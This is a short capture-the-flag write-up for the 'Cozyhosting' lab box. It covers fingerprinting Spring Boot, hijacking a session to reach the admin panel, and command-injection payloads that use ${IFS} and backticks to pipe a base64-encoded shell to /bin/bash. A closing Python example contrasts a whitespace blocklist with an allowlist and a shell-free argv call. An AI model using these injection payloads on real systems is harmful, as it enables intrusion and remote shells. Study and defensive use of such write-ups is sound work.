Cozyhosting

Steps of exploitation and lessons learned

  • The Whitelabel Error Page shows that this app is Spring Boot (Java).

  • A normal directory search does not work, so we use the Spring Boot-specific wordlist from SecLists.

  • Use the session parameter to get into the admin panel.

Techniques to escape the ssh command

  • Use ${IFS} in place of whitespace.

Encode the payload as Base64 and decode it to spawn a shell:

;echo${IFS}<encodedshell>|base64${IFS}-d|/bin/bash;

Use backticks (` `) as command substitution:

;`encoded reverse_shell`
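
Why the ${IFS} trick works and what closes it, as an added example that is not part of the original notes: it compares a whitespace-only filter with an allowlist and builds the ssh call as an argument vector instead of a shell string. It assumes the application rejects only whitespace in the username; the regex policy and all function names are hypothetical.

```python
import re

# Hypothetical allowlists (assumptions, not from the notes).
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")

# Strings quoted in the notes, placeholders left as written, plus one benign value.
SAMPLES = [
    "deploy",
    ";echo${IFS}<encodedshell>|base64${IFS}-d|/bin/bash;",
    ";`encoded reverse_shell`",
]


def whitespace_blocklist_ok(value: str) -> bool:
    """Assumed weak check: reject only literal whitespace characters."""
    return not any(ch.isspace() for ch in value)


def allowlist_ok(value: str, pattern: re.Pattern) -> bool:
    """Strict check: the whole value must match a known-good shape."""
    return pattern.fullmatch(value) is not None


def build_ssh_argv(username: str, host: str) -> list:
    """Return an argument vector for exec without a shell, or raise ValueError."""
    if not allowlist_ok(username, USERNAME_RE):
        raise ValueError("username rejected by allowlist")
    if not allowlist_ok(host, HOSTNAME_RE):
        raise ValueError("host rejected by allowlist")
    # Pass this list to subprocess.run(argv) with shell=False (the default):
    # no shell parses it, so ';', '|', '${IFS}' and backticks have no meaning.
    return ["ssh", "-o", "BatchMode=yes", f"{username}@{host}"]


def compare_filters(samples):
    """Map each sample to (passes whitespace blocklist, passes allowlist)."""
    return {s: (whitespace_blocklist_ok(s), allowlist_ok(s, USERNAME_RE)) for s in samples}


if __name__ == "__main__":
    for value, (weak, strict) in compare_filters(SAMPLES).items():
        print(f"{value!r}: whitespace-blocklist={weak} allowlist={strict}")
```

The ${IFS} string contains no whitespace character, so the blocklist accepts it while the allowlist rejects it.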
